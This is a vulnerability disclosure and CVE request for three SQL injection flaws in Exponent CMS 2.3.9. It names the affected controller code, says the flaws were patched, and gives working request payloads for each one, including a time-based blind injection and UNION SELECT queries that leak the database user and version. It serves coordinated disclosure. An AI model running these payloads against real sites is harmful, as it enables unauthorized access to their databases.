CVE request：Exponent CMS 2.3.9 SQL injection vulnerabilities

[felix k3y <felixk3y () gmail com>]

Hi, I reported the following SQL Injection vulnerabilities to the
ExponentCMS team on Sep 13, 2016:

1)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175

2)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195

3)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134


/index.php?controller=address&action=activate_address
In the first case, you can sending "id=1 and if(1,sleep(1),0)%23" in the
POST data of an HTTP request;

/index.php?controller=blog&action=show&title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23
In the second, you can sending "title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an
HTTP request;

/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1
In the last one , you can sending
"content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in
the GET data of an HTTP request.



And Now, all SQL Injection vulnerabilityies have been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3
https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3

I would like to request CVEs for those issues (if not done so).

thx.
--------------------------------------
felixk3y#gmail.com
penghua#silence.com.cn
PKAV Team